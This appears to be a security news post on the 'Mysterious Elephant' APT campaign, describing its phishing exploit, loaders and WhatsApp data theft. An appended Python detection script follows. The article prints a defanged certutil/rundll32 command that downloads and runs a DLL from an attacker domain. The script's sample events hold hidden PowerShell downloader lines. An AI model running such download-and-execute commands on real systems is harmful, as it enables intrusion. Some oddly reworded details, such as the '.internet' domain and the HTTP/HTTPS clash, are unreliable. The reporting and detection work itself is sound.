Cyber Web Spider Blog – News
Mysterious Elephant APT Hackers Infiltrate Organization to Steal Sensitive Information

Posted on October 16, 2025 By CWS

In recent months, a new advanced persistent threat (APT) group known as Mysterious Elephant has emerged as a formidable adversary targeting government and diplomatic institutions across the Asia-Pacific region.

First identified by Kaspersky's Global Research and Analysis Team (GReAT) in 2023, the group has continued to refine its toolkit, employing both custom-built malware and modified open-source utilities to evade detection and maintain long-term access.

Early indicators pointed to simple phishing lures delivering weaponized documents, but the latest campaign reflects a significant evolution in both delivery mechanisms and post-exploitation tooling.

Initial intrusions leveraged spear-phishing emails embedding malicious Office documents that exploit CVE-2017-11882.

Upon user interaction, these documents drop a lightweight PowerShell loader that retrieves more complex payloads from attacker-controlled infrastructure. This loader, dubbed BabShell, serves as the foundation of the threat actor's modular framework.

As the campaign progressed into 2025, Mysterious Elephant integrated a second-stage loader, MemLoader HidenDesk, to inject remote access trojans directly into memory, reducing forensic artifacts on disk.

Securelist analysts noted that subsequent phases of the operation focus on exfiltrating sensitive WhatsApp data, including documents, images, and archives, using custom exfiltrators named Uplo Exfiltrator and Stom Exfiltrator.

Mysterious Elephant spear phishing electronic mail (Supply – Securelist)

These components encode stolen data with XOR-based obfuscation before transmitting it over HTTP to wildcard DNS domains such as storycentral.internet and monsoonconference.com.

By leveraging legitimate-looking domains and HTTPS, the group blends malicious traffic with normal corporate web use, complicating network-based detection.

# Download and execute the BabShell payload (command observed in the campaign; URL defanged)
certutil -urlcache -f "hxxp://storycentral.internet/BabShell.dll" BabShell.dll
rundll32.exe BabShell.dll,EntryPoint

Infection Mechanism

The infection chain begins with a spear-phishing email containing a seemingly benign meeting invitation in an RTF document.

When opened, the document triggers a memory corruption vulnerability in the Office Equation Editor (CVE-2017-11882), silently spawning a PowerShell process.

This PowerShell instance runs in hidden mode (-nop -w hidden) and uses .NET's WebClient class to fetch the BabShell DLL loader.

Once loaded, BabShell decrypts its embedded configuration, which includes C2 URLs and module names, before invoking its EntryPoint export to establish a heartbeat channel.

After initial beaconing, BabShell fetches the MemLoader HidenDesk module and injects it into a system service process.

This in-memory loader parses a custom packet format, decompresses the RAT payload (a variant of Remcos), and transfers execution to the newly mapped code.

By avoiding disk writes, MemLoader HidenDesk significantly reduces the forensic evidence left behind, allowing Mysterious Elephant to move laterally and harvest target data undetected.

The group's use of open-source codebases, combined with proprietary modifications, underscores both its resourcefulness and its technical sophistication.

Through these multi-stage infection tactics, Mysterious Elephant continues to refine its approach, demanding equally adaptive defense strategies from security teams tasked with safeguarding sensitive information.
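As an added example (not code from the article or from Securelist), the following Python triage routine runs the detection logic this chain suggests over constructed Sysmon-style process-creation events: Equation Editor spawning a hidden PowerShell downloader, certutil -urlcache fetching a DLL, and rundll32 loading a DLL with a named export from a user-writable path. The event fields, the example.invalid URL and the rule names are assumptions made for this example.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation events modelled on the chain described
# above; they are sample data for this example, not telemetry from the campaign.
EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
            ".DownloadFile('hxxp://example.invalid/BabShell.dll','BabShell.dll')\""},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmd": 'certutil -urlcache -f "hxxp://example.invalid/BabShell.dll" BabShell.dll'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Users\u\AppData\Local\Temp\BabShell.dll,EntryPoint"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmd": "notepad.exe notes.txt"},
]

USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp|AppData)\\", re.IGNORECASE)
HIDDEN_PS = re.compile(r"-(w|windowstyle)\s+hidden", re.IGNORECASE)
DOWNLOAD_API = re.compile(r"WebClient|DownloadFile|DownloadString|Invoke-WebRequest", re.IGNORECASE)
CERTUTIL_FETCH = re.compile(r"-urlcache\b.*\b\w+://", re.IGNORECASE)  # defanged hxxp:// counts too
RUNDLL_DLL = re.compile(r"rundll32(\.exe)?\s+(?P<dll>[^,\s]+\.dll),(?P<export>\w+)", re.IGNORECASE)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def match_rules(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event trips (empty list = nothing suspicious)."""
    hits, parent, image, cmd = [], basename(ev["parent"]), basename(ev["image"]), ev["cmd"]
    if parent == "eqnedt32.exe" and image in ("powershell.exe", "cmd.exe", "mshta.exe"):
        hits.append("equation_editor_spawns_shell")      # CVE-2017-11882 post-exploitation
    if image == "powershell.exe" and HIDDEN_PS.search(cmd) and DOWNLOAD_API.search(cmd):
        hits.append("hidden_powershell_downloader")      # -nop -w hidden plus WebClient fetch
    if image == "certutil.exe" and CERTUTIL_FETCH.search(cmd):
        hits.append("certutil_urlcache_download")        # LOLBin download of a DLL
    m = RUNDLL_DLL.search(cmd)
    if image == "rundll32.exe" and m and USER_WRITABLE.search(m.group("dll")):
        hits.append("rundll32_user_writable_dll")        # DLL + export loaded from a temp path
    return hits

def triage(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index every event that trips at least one rule, with the rules it tripped."""
    out = []
    for i, ev in enumerate(events):
        hits = match_rules(ev)
        if hits:
            out.append((i, hits))
    return out

if __name__ == "__main__":
    for idx, rules in triage(EVENTS):
        print(idx, rules, "::", EVENTS[idx]["cmd"][:70])
```

The rules are deliberately independent so that a chain broken at one stage (for example, a hidden PowerShell downloader without the Equation Editor parent) still surfaces.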
